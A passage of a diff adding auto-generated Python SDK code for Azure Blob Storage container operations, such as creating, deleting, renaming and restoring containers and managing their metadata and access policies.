-> HttpRequest + restype = kwargs.pop('restype', "account") # type: str + comp = kwargs.pop('comp', "properties") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + +# fmt: on +class ContainerOperations(object): + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.AzureBlobStorage`'s + :attr:`container` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs): + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace + def create( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + access=None, # type: Optional[Union[str, "_models.PublicAccessType"]] + request_id_parameter=None, # type: Optional[str] + container_cpk_scope_info=None, # type: Optional["_models.ContainerCpkScopeInfo"] + **kwargs # type: Any + ): + # type: (...) -> None + """creates a new container under the specified account. If the container with the same name + already exists, the operation fails. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param access: Specifies whether data in the container may be accessed publicly and the level + of access. Default value is None. + :type access: str or ~azure.storage.blob.models.PublicAccessType + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. 
+ :type request_id_parameter: str + :param container_cpk_scope_info: Parameter group. Default value is None. + :type container_cpk_scope_info: ~azure.storage.blob.models.ContainerCpkScopeInfo + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + + _default_encryption_scope = None + _prevent_encryption_scope_override = None + if container_cpk_scope_info is not None: + _default_encryption_scope = container_cpk_scope_info.default_encryption_scope + _prevent_encryption_scope_override = container_cpk_scope_info.prevent_encryption_scope_override + + request = build_create_request( + url=self._config.url, + restype=restype, + version=self._config.version, + timeout=timeout, + metadata=metadata, + access=access, + request_id_parameter=request_id_parameter, + default_encryption_scope=_default_encryption_scope, + prevent_encryption_scope_override=_prevent_encryption_scope_override, + template_url=self.create.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + create.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def get_properties( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """returns all user-defined metadata and system properties for the specified container. The data + returned does not include the container's list of blobs. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. 
+ :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + + _lease_id = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_get_properties_request( + url=self._config.url, + restype=restype, + version=self._config.version, + timeout=timeout, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + template_url=self.get_properties.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-public-access']=self._deserialize('str', response.headers.get('x-ms-blob-public-access')) + response_headers['x-ms-has-immutability-policy']=self._deserialize('bool', response.headers.get('x-ms-has-immutability-policy')) + response_headers['x-ms-has-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-has-legal-hold')) + response_headers['x-ms-default-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-default-encryption-scope')) + 
response_headers['x-ms-deny-encryption-scope-override']=self._deserialize('bool', response.headers.get('x-ms-deny-encryption-scope-override')) + response_headers['x-ms-immutable-storage-with-versioning-enabled']=self._deserialize('bool', response.headers.get('x-ms-immutable-storage-with-versioning-enabled')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_properties.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def delete( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """operation marks the specified container for deletion. The container and any blobs contained + within it are later deleted during garbage collection. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. 
+ :paramtype restype: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_delete_request( + url=self._config.url, + restype=restype, + version=self._config.version, + timeout=timeout, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.delete.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + delete.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def set_metadata( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """operation sets one or more user-defined name-value pairs for the specified container. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. 
Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "metadata". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "metadata") # type: str + + _lease_id = None + _if_modified_since = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + + request = build_set_metadata_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + lease_id=_lease_id, + metadata=metadata, + if_modified_since=_if_modified_since, + request_id_parameter=request_id_parameter, + template_url=self.set_metadata.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_metadata.metadata = {'url': "{url}/{containerName}"} # type: 
ignore + + + @distributed_trace + def get_access_policy( + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> List["_models.SignedIdentifier"] + """gets the permissions for the specified container. The permissions indicate whether container + data may be accessed publicly. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "acl". Note that overriding this default value may result + in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: list of SignedIdentifier, or the result of cls(response) + :rtype: list[~azure.storage.blob.models.SignedIdentifier] + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[List["_models.SignedIdentifier"]] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "acl") # type: str + + _lease_id = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_get_access_policy_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + template_url=self.get_access_policy.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-blob-public-access']=self._deserialize('str', response.headers.get('x-ms-blob-public-access')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', 
response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('[SignedIdentifier]', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_access_policy.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def set_access_policy( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + access=None, # type: Optional[Union[str, "_models.PublicAccessType"]] + request_id_parameter=None, # type: Optional[str] + container_acl=None, # type: Optional[List["_models.SignedIdentifier"]] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """sets the permissions for the specified container. The permissions indicate whether blobs in a + container may be accessed publicly. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param access: Specifies whether data in the container may be accessed publicly and the level + of access. Default value is None. + :type access: str or ~azure.storage.blob.models.PublicAccessType + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param container_acl: the acls for the container. Default value is None. + :type container_acl: list[~azure.storage.blob.models.SignedIdentifier] + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "acl". Note that overriding this default value may result + in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "acl") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + serialization_ctxt = {"xml": {'name': 'SignedIdentifiers', 'wrapped': True, 'itemsName': 'SignedIdentifier'}} + if container_acl is not None: + _content = self._serialize.body(container_acl, '[SignedIdentifier]', is_xml=True, serialization_ctxt=serialization_ctxt) + else: + _content = None + + request = build_set_access_policy_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + lease_id=_lease_id, + access=access, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.set_access_policy.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_access_policy.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def restore( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + deleted_container_name=None, # type: Optional[str] + deleted_container_version=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> None + """Restores a previously-deleted container. + + :param timeout: The timeout parameter is expressed in seconds. 
For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param deleted_container_name: Optional. Version 2019-12-12 and later. Specifies the name of + the deleted container to restore. Default value is None. + :type deleted_container_name: str + :param deleted_container_version: Optional. Version 2019-12-12 and later. Specifies the + version of the deleted container to restore. Default value is None. + :type deleted_container_version: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "undelete". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "undelete") # type: str + + + request = build_restore_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + deleted_container_name=deleted_container_name, + deleted_container_version=deleted_container_version, + template_url=self.restore.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + restore.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def rename( # pylint: disable=inconsistent-return-statements + self, + source_container_name, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + source_lease_id=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> None + """Renames an existing container. + + :param source_container_name: Required. Specifies the name of the container to rename. 
+ :type source_container_name: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param source_lease_id: A lease ID for the source path. If specified, the source path must have + an active lease and the lease ID must match. Default value is None. + :type source_lease_id: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "rename". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "rename") # type: str + + + request = build_rename_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + source_container_name=source_container_name, + timeout=timeout, + request_id_parameter=request_id_parameter, + source_lease_id=source_lease_id, + template_url=self.rename.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + rename.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def submit_batch( + self, + content_length, # type: int + body, # type: IO + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> IO + """The Batch operation allows multiple API calls to be embedded into a single HTTP request. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param timeout: The timeout parameter is expressed in seconds. 
For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword multipart_content_type: Required. The value of this header must be multipart/mixed + with a batch boundary. Example header value: multipart/mixed; boundary=batch_:code:``. + :paramtype multipart_content_type: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "batch". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: IO, or the result of cls(response) + :rtype: IO + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[IO] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + multipart_content_type = kwargs.pop('multipart_content_type') # type: str + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "batch") # type: str + + _content = self._serialize.body(body, 'IO') + + request = build_submit_batch_request( + url=self._config.url, + multipart_content_type=multipart_content_type, + restype=restype, + comp=comp, + version=self._config.version, + content=_content, + content_length=content_length, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.submit_batch.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=True, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + deserialized = response.stream_download(self._client._pipeline) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + submit_batch.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def filter_blobs( + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + where=None, # type: Optional[str] + marker=None, # type: Optional[str] + maxresults=None, # type: Optional[int] + **kwargs # type: Any + ): + # type: (...) -> "_models.FilterBlobSegment" + """The Filter Blobs operation enables callers to list blobs in a container whose tags match a + given search expression. Filter blobs searches within the given container. 
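+
+    A minimal usage sketch (hypothetical names; assumes ``conn_str`` holds a valid
+    connection string and that the installed azure-storage-blob version exposes
+    ``ContainerClient.find_blobs_by_tags``, the public wrapper that routes through
+    this generated operation)::
+
+        from azure.storage.blob import ContainerClient
+
+        container = ContainerClient.from_connection_string(conn_str, "mycontainer")
+        for blob in container.find_blobs_by_tags("project = 'demo'"):
+            print(blob.name)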
+
+    :param timeout: The timeout parameter is expressed in seconds. For more information, see
+     :code:`Setting
+     Timeouts for Blob Service Operations.`. Default value is None.
+    :type timeout: int
+    :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
